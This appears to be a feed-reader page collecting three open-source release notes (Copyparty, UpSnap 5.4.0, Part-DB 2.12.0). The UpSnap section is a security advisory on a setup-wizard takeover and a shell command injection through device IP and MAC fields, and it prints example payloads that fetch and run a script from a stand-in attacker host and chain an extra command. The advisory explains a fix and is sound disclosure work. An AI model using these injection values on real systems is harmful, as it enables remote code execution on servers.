❌

Lees weergave

↗️

s6-ready

βœ‡Copyparty
Door: 9001

there is a discord server with an @everyone in case of future important updates, such as vulnerabilities (most recently 2026-03-08)

recent important news

πŸ§ͺ new features

  • #1463 opds: improved compatibility with various clients (thx @kamaeff!) 9068ec6
  • #1485 users with read-access can now create get-only shares (thx @Scotsguy!) 0bb80e9
  • #1466 support the s6 service notification protocol (thx @mobin-2008!) 8c201b8 ca40647
  • download-as-zip/tar: the toplevel folder can be renamed with url-param &name=foo or entirely removed with &name cc5420a
  • #1487 option to generate music spectrograms with logarithmic frequency scale (thx @9hax!) 83dc20f
  • option to set custom name/path for ffmpeg/ffprobe binaries 5e806ec
  • #1489 audio playback of mka files

🩹 bugfixes

  • #1480 #1482 fix get-only shares not expiring if the creator is removed (thx @celinke97 and @Scotsguy!) 3b53a22
  • #1474 toggling between cropped/fullsize coverart for music didn't work 926c6e8
  • #1470 files from the year 30828 would break file listing 27031f7
  • #1494 fix js-crash when dragging a pic from the gallery out of the browser (thx @icxes!) 7d81b9e
  • "fancy markdown editor" didn't work on phones 6183540
  • improve signal handling f4f97b6
    • if I messed something up then --sig-thr or send 7x sigterm

πŸ”§ other changes

  • docker: the arm32 build of the iv image has graduated 6e75faa
    • copyparty/iv is now only available for i386 / x86_64 / aarch64
  • docker: rawpy is no longer bundled; now using libraw directly 348b4bb
    • creating thumbnails of .raw photos is now MUCH slower but quality is also much better
  • partyfuse: switch to mfusepy; adds fuse3 support and improves performance b2401ff
  • additional advisory tiers for use with the vulnerability-checker 4e9ad78
  • clarify behavior of xvol regarding permissions e327183
  • packaging/docs:

🌠 fun facts

  • there will be a tiny handful of copyparty stickers at dokomi this weekend

πŸ’Ύ what to download?

download link is it good? description
copyparty-sfx.py βœ… the best πŸ‘ runs anywhere! only needs python
copyparty-en.py βœ… also good same but english-only, no i18n
a docker image it's ok good if you prefer docker πŸ‹
copyparty.exe ⚠️ acceptable for win8 or later; built-in thumbnailer
u2c.exe ⚠️ acceptable CLI uploader as a win7+ exe (video)
copyparty.pyz ⚠️ acceptable similar to the regular sfx, mostly worse
copyparty-en.pyz ⚠️ acceptable english-only, no smb-server
copyparty32.exe ⛔️ dangerous for win7 -- never expose to the internet!
cpp-winpe64.exe ⛔️ dangerous runs on 64bit WinPE, otherwise useless
bootable usb ┐(οΎŸβˆ€οΎŸ)β”Œ a surprisingly useful joke (x86_64)
  • except for u2c.exe, all of the options above are mostly equivalent
  • the zip and tar.gz files below are just source code
  • python packages are available at PyPI

  •  
  • ↗️
↗️

5.4.0

βœ‡UpSnap
Door: github-actions[bot]

Note

UpSnap is, and always will be, free and open source software.

If someone is asking you to pay money for access to UpSnap binaries, source code, or licenses, you are being scammed.

The official and only trusted source for UpSnap is this repository (and its linked releases).
Do not pay third parties for something that is provided here for free.

New Setup Process

GHSA-w4jr-728f-5jhq

What changed

The initial setup process has been changed. Instead of a built-in multi-step wizard, UpSnap now directs you to create your first superuser account via the server console logs, which contain a one-time setup link generated by PocketBase.

Once you've created the superuser using that link, return to the UpSnap welcome page and click Done to continue.

Why this was necessary

In versions prior to 5.4.0, the setup wizard allowed anyone with network access to register the first superuser account if they reached the setup page before the legitimate administrator. This meant that on a publicly reachable instance, an attacker could take ownership of the application before the real admin had a chance to complete the setup.

By moving account creation out-of-band to the server console, only someone with access to the server logs (i.e. the administrator) can complete the initial setup.

Note

If you have sucessfully completed the initial setup in the past you are not affected.

RCE via Device IP and MAC Address Injection

GHSA-6mc7-6948-w5h4

What was the issue

UpSnap allows setting custom shell commands for waking and shutting down devices. These commands support {{ DEVICE_IP }} and {{ DEVICE_MAC }} placeholders, which are replaced with the device's actual IP and MAC values before being executed on the server.

In versions prior to 5.4.0, these values were only changed by removing spaces before being substituted into the shell command. An attacker with permission to edit a device could set a malicious IP or MAC field, for example:

IP: 127.0.0.1;curl${IFS}http://attacker.com/shell.sh|sh
MAC: 00:00:00:00:00:00&&id

When the device was woken or shut down, the injected commands would execute on the server with the same privileges as UpSnap itself.

What was fixed

  1. Backend: Before substituting {{ DEVICE_IP }} and {{ DEVICE_MAC }} into any shell command, UpSnap additionally validates both values using Go's standard net.ParseIP and net.ParseMAC. If a value somehow reaches this point in an invalid state, the command is rejected and an error is returned instead of executing.

  2. Database: A new migration adds regex constraints to the ip and mac fields in the PocketBase schema (^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}$ for IP, ^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$ for MAC). Any write that bypasses the UI is rejected at the database level.

  3. HTML input: The IP and MAC fields in the device form now have pattern attributes that enforce valid formats directly in the browser, preventing malformed values from being submitted in the first place.

Who is affected

Any instance where untrusted users had permission to create or edit devices. Users who are the sole administrator of their own instance and have not shared device-edit access are at lower risk.

Changelog

Bug fixes

Others

  •  
  • ↗️
↗️

Part-DB 2.12.0

βœ‡Part-DB
Door: jbtronics

Tip

If you like Part-DB, consider donating to support the development. Press the sponsor button on the main github page, for more info.

Important

If you are using Part-DB it would be helpful if you fill out this short survey on your usage of Part-DB (Google Forms): https://forms.gle/Q15twx3YYq3qCNfe8

New features

  • Added browser plugin to quickly submit pages from a browser to Part-DB to create parts out of it. As it submits the browser HTML, this allows also for info extraction from pages like ebay, amazon or aliexpress. Plugin is available for Chrome and Firefox
  • Added an "unsaved changes" warning, on when a form contains unsaved changes and user tries to navigate away (#1368)
  • Changed/Unsaved fields get highlighted with a light blue border in forms
  • The discard changes button also now correctly works with rich text editor fields and select fields.

Bug fixes

  • Fixed problem with attachment referencing in API (#1370)

Miscellaneous

  • Updated dependencies
  • Updated translations
  • Updated kicad symbols

Full Changelog: v2.11.1...v2.12.0

  •  
  • ↗️
❌